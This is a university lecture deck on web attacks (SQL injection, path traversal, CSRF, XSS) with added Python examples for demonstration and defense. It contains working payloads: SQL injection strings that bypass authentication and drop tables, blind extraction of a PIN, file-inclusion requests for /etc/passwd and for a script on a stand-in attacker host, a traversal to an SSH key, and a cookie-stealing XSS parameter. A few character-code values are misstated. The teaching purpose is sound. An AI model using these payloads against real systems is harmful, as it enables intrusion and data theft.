1. 4MMSR - Information Systems Security
3 - Web vulnerabilities and attacks
Fabien Duchene [1] (@fabien_duchene)
[Lecturer version]
[1] Laboratoire d'Informatique de Grenoble, VASCO team
Grenoble Institute of Technology - Grenoble INP Ensimag
firstname.name@imag.fr
2011-2012
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 1/86 2011-2012 1 / 86
2. Outline
1 Injection
   Introduction
   Web Application: definition
2 Some web injections vulnerabilities
   SQL Injection
   Path Traversal
   CSRF
   XSS - Cross-Site scripting
4. Injection Introduction
Injection I
Intuitive Definition: exploitation of a vulnerability that permits injecting data and/or code on the target. [Kunz 2011]
5. Injection Introduction
Injection II
Threat level [OWASP 2011]
Exploitability: EASY (+++)
Prevalence: COMMON (++)
Detectability: AVERAGE (++)
Impact: SEVERE (+++)
6. Injection Introduction
Some Injection vulnerabilities
An attacker's goal: run code he controls on the subsystem

vulnerability | targeted subsystem | what is injected | impact
Buffer Overflow, Format String | in-memory executable | assembly data and instructions | code execution ⇒ integrity, confidentiality, availability of data
SQL Injection | database | SQL data and commands | code execution ⇒ integrity, confidentiality, availability of data
XSS | web application (client browser) | HTML / JS / Java / ... code | code execution ⇒ integrity, confidentiality, availability of data
Path Traversal | reading, writing, deleting files | file name | integrity, confidentiality, availability of files

(Some) causes
non sufficiently sanitized inputs
insecure use of input parameters
8. Injection Web Application: definition
Intuitive definition I
9. Injection Web Application: definition
Intuitive definition II
Inputs
HTTP request headers: names and values:
10. Injection Web Application: definition
Intuitive definition III
Outputs
HTTP Response HEADERS
HTTP Response BODY
...
11. Injection Web Application: definition
Web Application: Formal definition I
[Fabien Duchene 2012]
Let $\Sigma$ be an alphabet.
A transition $u$ of a web application is a mapping from $n$ user inputs $i^u_l \in \Sigma^*$, $I_u = (i^u_1, \ldots, i^u_n)$, to an output $q = q_1 \cdot q_2 \cdot \ldots \cdot q_k$, $q \in \Sigma^*$. Each $q_j$ is either a webserver-filtered input parameter $i^u_l$, i.e. $\exists f_r \in Filters,\ q_j = f_r(i^u_l)$ (such a $q_j$ is tainted; the original slides underline it), or a string $q_h$ surrounding one or two $q_j$.
$q$ is (in many cases) generated by $G_O$, the output grammar (eg: HTML).
An input sequence is $I = (I_1, \ldots, I_m)$ where each $I_u$ adheres to the above definition.
$Filters$ is a finite set of functions from $\Sigma^* \to \Sigma^*$ such as PHP addslashes().
12. Injection Web Application: definition
Web Application: Formal definition II
A web application is modeled as an Input Output Labelled Transition System, in which each transition $u$ conforms to the above definition.
14. Some web injections vulnerabilities SQL Injection
SQL Injection Attack (SQLi) I
code injection at the database layer of an application
subsystem: SQL database
goal: read or alter (modify or delete) data
impact:
15. Some web injections vulnerabilities SQL Injection
SQL injection: schema
SQLi: a method
0. have a goal: what do you aim to do? eg: steal and delete all customer data?
LOOP:
  1.1 gain knowledge: "how easy" can we inject? do we have a helpful error message?
  1.2 try the most interesting ones of the applicable exploitation methods (wrt the current database knowledge)
16. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrect type handling" I
Incorrect type handling
data is not strongly typed
in the example: an integer is expected, but the language interpreter evaluates the whole expression
  statement := "SELECT * FROM weather_data WHERE station=" + a_variable + ";"
Example: webgoat SQLi [1]
17. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrect type handling" II
Basic form. We submit it once and observe:
Once we submit, the station parameter seems to be used in the data retrieval. Goal: extract all the data from that database table.
18. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrect type handling" III
Have a look at the source code, and observe the parameter name.
Since it is simpler to perform requests via HTTP GET, give it a try:
19. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrect type handling" IV
It works: the station parameter sent via a GET request is used by the web application.
Let us try to inject: craft the parameter so that the WHERE condition always evaluates to TRUE.
20. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrect type handling" V
exploitation succeeds: we are able to extract all the records from that table
21. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrect type handling" VI
Also works if we use HTTP POST, here with Firefox Hackbar [2]
Note: we only tried to get the data, but think about [3]:
  station=103 OR 1=1; DROP TABLE weather_data
[1] [Webgoat - numeric SQL injection] Webgoat - numeric SQL injection
[2] [Firefox hackbar add-on] Firefox hackbar add-on
[3] Most SQL server implementations allow multiple statements. APIs generally do not: PHP mysql_query() and Python sqlite3.[.].execute() do not support this. Some functions such as Python sqlite3.[.].executescript() however do.
23. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrectly filtered escape characters" I
Incorrectly filtered escape characters
user input is not filtered for escape characters (eg: ' " ..)
parameters are passed without using prepared statements
  statement = "SELECT * FROM users WHERE name = '" + userName + "';"
How would you set the variable userName to bypass the authentication?
A possible answer: ' or 'trueblood'='trueblood
25. Some web injections vulnerabilities SQL Injection
SQLi: basic - "Incorrectly filtered escape characters" II
  statement = "SELECT * FROM users WHERE name = '" + userName +
              "'; UPDATE logon_attempts SET attempts=attempts+1 WHERE name='" + userName + "';"
How do we prevent the logon attempt counter from increasing for that username?
A possible answer: escape the second query thanks to SQL comments:
  mario ; --
26. Some web injections vulnerabilities SQL Injection
A Formal Definition of an SQL injection I
[Wassermann 2008]
Syntactic confinement
Given a context-free grammar $G = (V, \Sigma, S, R)$ with nonterminals $V$, terminals $\Sigma$, a start symbol $S$ and production rules $R$. Let $\Rightarrow_G$ denote "derives in one step", s.t. if $\alpha, \beta \in (\Sigma \cup V)^*$ and $A \to \gamma \in R$ then $\alpha A \beta \Rightarrow_G \alpha \gamma \beta$. Let $\Rightarrow^*_G$ be the reflexive transitive closure of $\Rightarrow_G$.
Also, given a string $\sigma = \sigma_1 \sigma_2 \sigma_3 \in \Sigma^*$, $\sigma_2$ is syntactically confined in $\sigma$ iff there exists a sentential form $\sigma_1 X \sigma_3$ s.t. $X \in (V \cup \Sigma)$ and $S \Rightarrow^*_G \sigma_1 X \sigma_3 \Rightarrow^*_G \sigma_1 \sigma_2 \sigma_3$.
27. Some web injections vulnerabilities SQL Injection
A Formal Definition of an SQL injection II
Sufficient condition for an SQL injection
$G_O$, the output grammar, is the SQL grammar. For a given transition $e$ with inputs $I_e = (i^e_1, i^e_2, \ldots, i^e_n)$, let the corresponding output be $q = q_1 + q_2 + \ldots + q_k$.
If $\exists$ a tainted $q_j$ in $q$ s.t. $q_j$ is not syntactically confined in $q$, then $I_e$ is an SQL injection attack.
28. Some web injections vulnerabilities SQL Injection
A Formal Definition of an SQL injection III
For input parameter 2, no production rule could generate only the tainted output "2 OR 1 = 1".
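As an added illustration of the definition above (not Wassermann's checker and not the course's code), a token-level approximation of syntactic confinement: the tainted span of the concatenated query must fall inside a single token, i.e. correspond to a single literal leaf of the parse tree, exactly what fails for "2 OR 1 = 1". The lexer covers only the small SQL subset the slides' queries need, which is an assumption of this example; a real checker would reuse the database's own parser.

```python
import re

# Lexer for the small SQL subset used in the slides (an assumption of this
# example; a real checker would use the database's own parser).
TOKEN = re.compile(r"""
      '(?:[^']|'')*'               # string literal, '' is an escaped quote
    | --[^\n]*                     # line comment
    | \d+                          # number
    | [A-Za-z_][A-Za-z_0-9]*       # keyword or identifier
    | <>|<=|>=|[=<>*;,()]          # operators and punctuation
    | \s+                          # whitespace, skipped
""", re.VERBOSE)

def tokenize(sql):
    """Return (text, start, end) for every non-blank token of sql."""
    tokens, pos = [], 0
    while pos < len(sql):
        m = TOKEN.match(sql, pos)
        if m is None:                      # unknown character: a token of its own
            tokens.append((sql[pos], pos, pos + 1))
            pos += 1
            continue
        if not m.group().isspace():
            tokens.append((m.group(), m.start(), m.end()))
        pos = m.end()
    return tokens

def is_confined(sql, start, end):
    """The tainted span [start, end) is confined iff exactly one token overlaps
    it and that token contains it entirely: q_j is then a single terminal."""
    overlapping = [t for t in tokenize(sql) if t[1] < end and t[2] > start]
    return (len(overlapping) == 1
            and overlapping[0][1] <= start and overlapping[0][2] >= end)

def check(prefix, user_input, suffix):
    """Build the query by concatenation, as the vulnerable code does, and judge
    the user-controlled part q_2 of q = q_1 + q_2 + q_3."""
    sql = prefix + user_input + suffix
    return is_confined(sql, len(prefix), len(prefix) + len(user_input))

if __name__ == "__main__":
    numeric = "SELECT * FROM weather_data WHERE station="
    quoted = "SELECT * FROM users WHERE name = '"
    print(check(numeric, "103", ";"))                                   # True
    print(check(numeric, "101 OR 1=1", ";"))                            # False
    print(check(quoted, "trueblood", "';"))                             # True
    print(check(quoted, "' or 'trueblood'='trueblood", "';"))           # False
    print(check(quoted, "O''Brien", "';"))                              # True (escaped quote)
```

The escaped-quote case shows why this is a property of the output and not of the input: "O''Brien" contains quotes yet stays inside one string literal, while the slide's answer spans five tokens.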
29. Some web injections vulnerabilities SQL Injection
"Blind" SQLi I
Blind SQL injection?
production environments do not let you see the error outputs
when trying to inject in such a system: "blind injection"
more injection techniques on [Hackipedia - SQL injection]
Example: webgoat blind integer SQLIA [4]
Assume a simple SELECT WHERE request such as:
30. Some web injections vulnerabilities SQL Injection
"Blind" SQLi II
  SELECT `field_name` FROM `table_name` WHERE `field1`='arg1'
If we try a random number:
If we try to input a non-integer:
generic error message (no "straightforward" information disclosure)
31. Some web injections vulnerabilities SQL Injection
"Blind" SQLi III
Is the application susceptible to blind injection?
Yes!
Does such a record exist?
  101 AND (SELECT COUNT(*) FROM pins WHERE cc_number=1111222233334444)>=1
32. Some web injections vulnerabilities SQL Injection
"Blind" SQLi IV
Now let us explore the possible space via dichotomy:
  101 AND (SELECT pin FROM pins WHERE cc_number=1111222233334444)<POWER(2,31)
  ... POWER(2,30)
  ... POWER(2,11): the first one (descending order) for which the condition is evaluated to false
33. Some web injections vulnerabilities SQL Injection
"Blind" SQLi V
Thus the value is between 2^11 = 2048 and 2^12 = 4096 (strictly)
Now let us continue the dichotomy:
Still too high...
Now too low...
We iterate that process, and finally:
34. Some web injections vulnerabilities SQL Injection
"Blind" SQLi VI
  101 AND (SELECT pin FROM pins WHERE cc_number=1111222233334444) <(POWER(2,11)+POWER(2,8)+POWER(2,5)+POWER(2,4)+POWER(2,3)+POWER(2,2)+POWER(2,0))
2^11 + 2^8 + 2^5 + 2^4 + 2^3 + 2^2 + 2^0 = 2365
Let us verify one last time that the value is 2364
35. Some web injections vulnerabilities SQL Injection
"Blind" SQLi VII
Blind string SQL Injection Attack [5]
Similar: character per character discovery
by using the CHAR(x) (x: integer ; ex in ASCII encoding: CHAR(41)='A' ; CHAR(61)='a'), ASCII(c) (c: character ; eg: ASCII('a')=61) and SUBSTRING(str,start,length) SQL functions
Encoding-dependent: ASCII, UTF8, UTF16 ...
Heuristic: would promote characters of the assumed alphabet
[4] [Webgoat - numeric SQL injection] Webgoat - numeric SQL injection
[5] [Mavituna - SQL injection sheet 2007] Mavituna - SQL injection sheet
37. Some web injections vulnerabilities SQL Injection
SQLi blind string injection: exercise
we want to find the first character of the field user_name of the table users of the record with user_id equal to 6969 ... thanks to the following SQL request (and we are able to manipulate $bet_id)
we know that bet_id = 3679 is a valid ID
  'SELECT MAX(`bet_amount`) FROM `bets` WHERE `bet_id`=' + $bet_id + ';'
A possible answer: Initialization:
  3679' AND (ASCII(SELECT SUBSTRING(user_name,0,1) WHERE user_id=6969) > ((ASCII('z')-ASCII('A'))/2) ; --
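To make the cost of a blind oracle concrete, here is an added example (not WebGoat's code nor the course's) that carries the dichotomy of slides 32 to 34 and the character-per-character discovery of slides 35 and 37 through against a constructed in-memory SQLite database, counting the requests spent. Table and column names follow the slides; the rows are invented except the PIN 2364 and the account 101 of the lesson. SQLite provides substr() and unicode() where the slides use SUBSTRING() and ASCII(), so that substitution, like the BlindOracle wrapper, is an assumption of this example.

```python
import sqlite3

# Constructed in-memory database (an added example, not WebGoat's code).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT)")
    db.execute("CREATE TABLE pins (cc_number INTEGER, pin INTEGER)")
    db.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT)")
    db.execute("INSERT INTO user_data VALUES (101, 'Joe')")
    db.execute("INSERT INTO pins VALUES (1111222233334444, 2364)")
    db.execute("INSERT INTO users VALUES (6969, 'Orlando')")
    return db

class BlindOracle:
    """The vulnerable page: the caller learns only whether a record was shown."""
    def __init__(self, db):
        self.db = db
        self.requests = 0          # how much traffic the recovery costs
    def __call__(self, account_number):
        self.requests += 1
        # account_number is concatenated unfiltered, the flaw the slides exploit.
        rows = self.db.execute(
            "SELECT * FROM user_data WHERE userid = " + account_number).fetchall()
        return len(rows) > 0

def bisect(oracle, subquery, lo, hi):
    """Dichotomy from the slides: keep lo <= value < hi, halve the interval with
    one request per step, stop when a single value remains."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(f"101 AND ({subquery}) < {mid}"):
            hi = mid
        else:
            lo = mid
    return lo

def recover_pin(oracle, cc_number, bits=31):
    # Starting from POWER(2,31) as on slide 32: 31 halvings reach the exact value.
    return bisect(oracle, f"SELECT pin FROM pins WHERE cc_number={cc_number}", 0, 2 ** bits)

def recover_string(oracle, column, table, where, length):
    # Blind string injection: one character at a time over printable ASCII 32..126.
    out = ""
    for pos in range(1, length + 1):          # substr() positions start at 1
        code = f"SELECT unicode(substr({column}, {pos}, 1)) FROM {table} WHERE {where}"
        out += chr(bisect(oracle, code, 32, 127))
    return out

if __name__ == "__main__":
    oracle = BlindOracle(make_db())
    print(recover_pin(oracle, 1111222233334444), oracle.requests)          # 2364 31
    print(recover_string(oracle, "user_name", "users", "user_id=6969", 7))  # Orlando
```

The request counter is the point of the "blind" label: hiding error messages removes no information, since 31 yes/no answers recover a 31-bit value and about 7 recover each character of a string. The fix is the parameterized statements of slides 38 and 39; on the detection side, the regular burst of near-identical requests differing only in a numeric comparison is what log review looks for.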
38. Some web injections vulnerabilities SQL Injection
SQLi Prevention I
input sanitization
  only allow some characters
  .. or explicitly deny some that have a meaning [6]
strongly type the parameters
Use parameterized statements
Java:
  java.sql.PreparedStatement prep = connection.prepareStatement(
      "SELECT * FROM users WHERE LASTNAME = ? AND AGE = ?");
  prep.setString(1, lastname);
  prep.setInt(2, age);
  prep.executeQuery();
[6] problem: might be encoding dependent (eg: UTF-8, UTF-16)
39. Some web injections vulnerabilities SQL Injection
SQLi Prevention II
PHP:
  $ps = $db->prepare(
      'SELECT pasta, flavor, quantity, order_day ' .
      'FROM orders WHERE user_id=? AND order_month=?');
  $ps->execute(array($current_user_id, $month));
40. Some web injections vulnerabilities Path Traversal
Path Traversal
Path Traversal aka "../" (dot-dot-slash) vulnerability
performing operations (read, execute, write) on files or folders that the web application developer(s) did not conceive the application for
impact:
security properties:
"LFI" Local File Inclusion
"RFI" Remote File Inclusion
41. Some web injections vulnerabilities Path Traversal
Path Traversal: schema I
42. Some web injections vulnerabilities Path Traversal
Path Traversal: schema II
A method
1. Observe how the inputs determine which file an action is performed on (and possibly which action)
2. Craft those inputs to perform the desired action(s) on the desired file(s)
43. Some web injections vulnerabilities Path Traversal
Example I
  <?php
  $color = 'blue';
  if (isset($_GET['LANGUAGE']))
      $language = $_GET['LANGUAGE'];
  include($language . '.php');
  ?>

  <form method="get">
    <select name="LANGUAGE">
      <option value="english">english</option>
      <option value="chinese">chinese</option>
    </select>
    <input type="submit">
  </form>
1–files/file–include.php
45. Some web injections vulnerabilities Path Traversal
Path vulnerability example
How would you perform an HTTP GET request in order to
list the content of the /etc/passwd file?
LFI. A possible answer: ?LANGUAGE=/etc/passwd%00
run code from a remote file?
RFI. A possible answer: ?LANGUAGE=http://evilwebsite.ext/evilscript.ext%00
47. Some web injections vulnerabilities Path Traversal
Example II
Consider a similar PHP code, replace the include line:
  ...
  include("/home/webapp1/public_html/code/languages/" . $language);
  ...
How would you read the RSA SSH private key (~/.ssh/id_rsa) of the user orlando (/home/orlando)?
Directory traversal. A possible answer: ../../../../orlando/.ssh/id_rsa
48. Some web injections vulnerabilities Path Traversal
Path traversal - countermeasures
(once more) input sanitization
limit file inclusion to a selected subset of directories. This can be done at several layers:
  interpreter (eg: PHP (allow_url_fopen, allow_url_include), ASP.Net)
  web-server configuration (eg: Apache httpd)
  chroot jails or similar systems (child processes will only be able to open files within the defined chroot jail)
enforce strict ACLs on sensitive files and run websites under a different identity than the owner(s) of those sensitive files
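The first two countermeasures at the application layer, as an added example (not the course's code): the language value is looked up in the fixed list the form offers before anything is done with it, and, as a second layer, the resolved file is checked to lie under the languages directory of the slide's include line. The directory and the two option values come from the slides; the function names are assumptions of this example, and the path logic uses posixpath so it runs the same on every platform.

```python
import posixpath

# Directory and form values taken from the slide's PHP example; the checks
# themselves are an added example, not the course's code.
BASE = "/home/webapp1/public_html/code/languages"
ALLOWED_LANGUAGES = {"english", "chinese"}     # the two <option> values the form offers

def confine_to_base(base, user_value):
    """Second layer: whatever the value, the resolved file must stay under base.
    Returns the normalised path, or None when the value escapes the directory."""
    if "\x00" in user_value:          # a NUL byte would cut the path short in C-level APIs
        return None
    # join() drops base entirely when user_value is absolute (the /etc/passwd case);
    # normpath() folds the "../" segments of a directory traversal.
    candidate = posixpath.normpath(posixpath.join(base, user_value + ".php"))
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate

def choose_include(user_value):
    """First layer: look the value up in the fixed list before touching the file system."""
    if user_value not in ALLOWED_LANGUAGES:
        return None
    return confine_to_base(BASE, user_value)

if __name__ == "__main__":
    for value in ["english", "../../../../orlando/.ssh/id_rsa", "/etc/passwd\x00",
                  "http://evilwebsite.ext/evilscript.ext"]:
        print(repr(value), "->", choose_include(value))
```

The remote-file case shows why the list lookup comes first: confine_to_base alone would accept the URL as a harmless relative name under the directory, while the lookup rejects it outright. Either check must run on the decoded value (the %00 of the slide's answers is a NUL byte once decoded).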
49. Some web injections vulnerabilities CSRF
CSRF I
Cross Site Request Forgery: main objective
the attacker tricks a victim into loading a webpage on a legitimate website
by loading that webpage, the victim will perform the action planned by the attacker
Causes
the web application is not able to distinguish between an automatic action and a user-driven one
50. Some web injections vulnerabilities CSRF
CSRF II
51. Some web injections vulnerabilities CSRF
CSRF III
CSRF: detailed steps
1. application logic discovery: the attacker crafts a precise HTTP request (including HTTP headers, GET and/or POST parameters and values) that, if run by another user, will perform the actions the attacker desires
2. the victim has first to be authenticated
3. a malicious message is sent, for the request to be performed automatically when the user reads it (eg: HTML via IM, twitter, email...)
4. the victim runs that code inside his browser, and actions are performed without him noticing it
52. Some web injections vulnerabilities CSRF
CSRF example I
Aimelyne wants to trick Ilyas so that she receives 2000 USD from him via the website payme.wtf
Application logic discovery
A uses payme.wtf to send a small amount, 5 USD, to Melissa
... and discovers that the following request is performed:
  GET http://payme.wtf/transfer.do?to=Melissa&amount=5 HTTP/1.1
54. Some web injections vulnerabilities CSRF
CSRF example II
Malicious link construction
How would A construct a malicious link so that people who perform that request would (if authenticated) send her 2000 USD?
  http://payme.wtf/transfer.do?to=Aimleyne&amount=2000
56. Some web injections vulnerabilities CSRF
CSRF example III
Transmission to the victim
How would A send that link to the victim?
A possible answer: email, instant messaging (eg: skype, gchat...)
The victim gets tricked
Assuming Ilyas is authenticated, if he clicks the link, Aimelyne will receive the money. [7]
What is the problem that now could occur?
Answer: Ilyas could notice that he just performed an action
How to prevent that?
A solution: force the HTTP GET request to be performed so that the user does not notice it. eg: very small iframe, img, script, css, flash ... basically anything a browser can load!
[7] We here assumed a GET request. POST requests could also be tricked (eg: HTML form, input submission triggered via javascript)
57. Some web injections vulnerabilities CSRF
CSRF countermeasures
client side:
  let the user decide whether to perform a cross-site request [RequestPolicy firefox add-on], [CsFire firefox add-on]
  prevention of redirections [Ryck et al. 2011]
server side:
  for each form request, include a "fresh state token" (the request is rejected if it is a replay)
    freshness requires sufficient randomization
    eg. dependencies: user identity, session, time, webpage from which the request comes, form "status"
    ASP.Net: viewstate
    Java: nothing out of the box, but the ability to build it. OWASP CSRFGuard
  checking the HTTP Referer header: from which webpage does the request come? is it the very same website or at least one that I do trust?
  limiting the lifetime of tickets (eg: cookies)
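The server-side measures of this slide, as an added example (not OWASP CSRFGuard and not the course's code): a fresh state token bound to the user's session and to the form it protects, carrying a random nonce and an issue time and authenticated with an HMAC under a server key, verified with a lifetime and an optional replay set; and the Referer check as a complement. The token layout, the function names and the 900-second lifetime are assumptions of this example; the server key is generated at import time here only for the sake of a self-contained run.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed for this example: a real deployment loads the key from configuration.
SERVER_KEY = secrets.token_bytes(32)

def issue_token(session_id, form_id, now, key=SERVER_KEY):
    """Fresh state token for one form of one session: a random nonce and the issue
    time (freshness), authenticated with an HMAC (integrity). Embedded as a hidden
    form field, it is unknown to anyone assembling a cross-site request."""
    nonce = secrets.token_hex(16)
    payload = f"{session_id}:{form_id}:{now}:{nonce}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return f"{now}:{nonce}:{tag}"

def verify_token(token, session_id, form_id, now, max_age=900, key=SERVER_KEY, seen=None):
    """Accept only a token minted for this session and this form, still within its
    lifetime, and (when a 'seen' set is supplied) never presented before."""
    try:
        issued, nonce, tag = token.split(":")
        issued = int(issued)
    except ValueError:
        return False
    payload = f"{session_id}:{form_id}:{issued}:{nonce}".encode()
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    if not (tag.isascii() and hmac.compare_digest(expected, tag)):  # constant-time compare
        return False
    if not 0 <= now - issued <= max_age:           # expired, or issued "in the future"
        return False
    if seen is not None:
        if nonce in seen:                          # replay of an already used token
            return False
        seen.add(nonce)
    return True

def referer_trusted(referer, trusted_hosts):
    """Second measure from the slide: does the request come from our own site?
    Browsers frequently omit the header, so this complements the token rather
    than replacing it."""
    if not referer:
        return False
    return urlsplit(referer).hostname in trusted_hosts

if __name__ == "__main__":
    t = issue_token("session-of-Ilyas", "transfer", now=1000)
    print(verify_token(t, "session-of-Ilyas", "transfer", now=1100))   # True
    print(verify_token(t, "session-of-Ilyas", "transfer", now=2000))   # False: expired
    print(referer_trusted("http://payme.wtf/transfer.do", {"payme.wtf"}))  # True
```

Binding the token to the form id is what the slide calls the form "status": a token issued for the transfer form cannot be reused on another form of the same session. The Referer check compares the parsed host name, not a string prefix, so a look-alike host such as payme.wtf.evil.example does not pass.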
58. Some web injections vulnerabilities XSS - Cross-Site scripting
X whaaat? I
XSS (aka Cross Site Scripting) is a code injection vulnerability within web applications. Exploiting it allows an attacker to inject code (eg: html, javascript, flash...) and to run it in the visitor context (victim's browser) in order to bypass access control mechanisms (eg: Same-Origin Policy)
"Cross-site": code from another source is run onto the attacked website.
12,885 XSS vulnerabilities reported in 2008 [8]
XSS starts with an X because... not to be confounded with CSS
XSS ...
  are executed on the client
  target the client side: data (eg: session cookies), control
59. Some web injections vulnerabilities XSS - Cross-Site scripting
X whaaat? II
How do attackers have fun?
  silently install malware in your browser
  steal your session credentials (eg: cookies)
  use your browser as part of a botnet
  http only: http://fd.the-wildcat.de/apache_e36a9cf46c.php
Same origin policy
  security boundary based on the very same (fqdn, port, and protocol)
  only the very same "entity" can access for instance user credentials
  eg: the following three are distinct origins:
    https://ocarina.imag.fr/page1.py
    http://ocarina.imag.fr/page3.html
    http://ocarina.imag.fr:82/page5.php
60. Some web injections vulnerabilities XSS - Cross-Site scripting
X whaaat? III
Causes
HTML mixes content, control statements and formatting
cross-site requests allowed by default
[8] [Symantec 2009] Symantec Global Internet Security Threat Report - trends for 2008
61. Some web injections vulnerabilities XSS - Cross-Site scripting
Where can it be found? I
any website processing arguments (HTTP GET, POST ...)
mail.google.com [Amit 2010] Cross-Site Scripting through Flash in Gmail Based Services
62. Some web injections vulnerabilities XSS - Cross-Site scripting
Where can it be found? II
m.facebook.com [CrazyDaVinci 2011] Autopost Spamming using Facebook Mobile XSS
63. Some web injections vulnerabilities XSS - Cross-Site scripting
XSS classification
According to the minimal number of executed transitions (a couple SUT request + answer):
type 0 XSS
type 1 XSS / reflected / non-persistent
type 2 XSS / stored / persistent
64. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS / type 1 attack [9]
[9] [IBM 2002] Cross-site scripting
66. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS / type 1 attack
Reflected XSS
aka non-persistent / type 1
"easy" to trigger
the most found in terms of number of vulnerabilities
different from CSRF! why? .. code execution on the client side!
67. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example I
web application: online shop
68. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example II
after submitting the form
69. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example III
observe the HTTP Request parameters:
What are their names and their assumed types?
70. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example III (I)
attempt to inject in QTY1:
  QTY1=1a<img src=mario.gif onerror=alert(1)>
try to inject another field. eg: field1
71. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example III (II)
  QTY1=1a<img src=mario.gif onerror=alert(1)>&QTY2=1&QTY3=1&QTY4=1&field2=4128+3214+0002+1999&field1=111<img src=mario.gif onerror=alert(document.cookie)>&SUBMIT=Purchase
success! we are able to inject some code! here, we showed that we can steal the victim's cookies
we can transfer the crafted URL to the victim via: twitter, IM, email ... (even shorten it, eg: bit.ly)
72. Some web injections vulnerabilities XSS - Cross-Site scripting
Type 1 - XSS a formal definition I
[Fabien Duchene 2012]
Let q be the following extract of the SUT output:
  <a name="[USER INFLUENCED INPUT]">Hola !</a>
$q = q_1 + q_2 + q_3$, with $q_2$ the tainted (user-influenced) part
$G_O$: HTML grammar (actually depends WHERE we can inject: JS, Flash..)
73. Some web injections vulnerabilities XSS - Cross-Site scripting
Type 1 - XSS a formal definition II
Extract of the parse tree $T_{G_O}$ of the SUT output (reconstructed from the slide's figure, where tainted terminals are underlined):
  A_LEFT
    <a
    A_ATTR
      A_ATTR_NAME: name = "kalimu"       (the tail of the value, kalimu", is tainted)
      A_ATTR_ONC:  onclick = "alert(1)"  (entirely tainted)
    >
The tainted output kalimu" onclick="alert(1) spans several attribute nodes instead of one attribute-value leaf, so it is not syntactically confined.
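The formal definition made executable for the attribute-value context of the slide, as an added example (not the course's code): the same payload as in the parse tree above is rendered into the slide's <a> template twice, once raw (as in the reflected example of slides 70 and 71) and once through an attribute-encoding filter, and Python's HTML parser is used to decide whether q2 stayed a single attribute-value leaf. The template text comes from the slide; the TagCollector helper and the choice of html.escape as the filter are assumptions of this example.

```python
import html
from html.parser import HTMLParser

# Added example, not the course's code: the template is the slide's <a> element,
# the payload is the one shown in the slide's parse tree.
TEMPLATE_OPEN, TEMPLATE_CLOSE = '<a name="', '">Hola !</a>'

class TagCollector(HTMLParser):
    """Records every start tag with its attributes (values come back unescaped)."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))

def render_raw(user_input):
    # q = q1 + q2 + q3 with q2 the user-influenced input and no filter applied
    return TEMPLATE_OPEN + user_input + TEMPLATE_CLOSE

def render_escaped(user_input):
    # A filter f_r for the attribute-value context: '"', '<', '>' and '&' become
    # character references, so q2 can only ever be attribute text.
    return TEMPLATE_OPEN + html.escape(user_input, quote=True) + TEMPLATE_CLOSE

def is_confined(markup, user_input):
    """q2 is syntactically confined in the attribute-value position iff the parsed
    output has the template's shape: exactly one <a> element whose only attribute
    is name, carrying the input verbatim. Any extra attribute or element means q2
    produced tokens outside that single leaf."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags == [("a", [("name", user_input)])]

if __name__ == "__main__":
    payload = 'kalimu" onclick="alert(1)'
    print(render_raw(payload), is_confined(render_raw(payload), payload))          # False
    print(render_escaped(payload), is_confined(render_escaped(payload), payload))  # True
```

The check is context-specific on purpose: the filter that confines q2 inside a quoted attribute value would not confine it inside a <script> block or an unquoted attribute, which is what the slide's remark "depends WHERE we can inject" refers to.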
74. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS / type 2 attack I [10]
[10] [IBM 2002] Cross-site scripting
75. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS
interesting for browser worms
impact more important (eg: Facebook wall)
in brief: the injected data is stored on the server and displayed to the victim through normal interaction only
76. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS - example I
[WebGoat - the vulnerable web application] WebGoat - the vulnerable web application
77. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS - example II
Login form
78. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS - example III
Profile visualization
79. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example
Profile edition
Any idea?
81. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example I
Now let us logon as Jerry
82. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example II
And check Tom’s profile:
83. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example III
P0wN3d!
84. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM based XSS / type 0 attack I
The web server no longer receives the payload
85. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM based XSS / type 0 attack II
DOM XSS steps
1. searching for a valid URL on the website
2. searching for ways to run code within the browser from a URL load request without sending it to the server
3. sending the malicious URL to the victim
4. the browser loads the legitimate webpage
5. and runs the payload (with nothing noticeable on the server side)
86. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM based XSS / type 0 attack III
Causes [Paola 2011]
sources: input data controlled, directly or indirectly, by the attacker
sinks: potentially dangerous functions
filters: operations on sources which change the content
badly designed client-side filters
focus on server-side XSS detection, while this is a client-side problem
87. Some web injections vulnerabilities XSS - Cross-Site scripting
Document Object Model
DOM? a tree that gives programmatic access to the objects represented in a rendered webpage (11)
11 [Document Object Model]
88. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM XSS example I
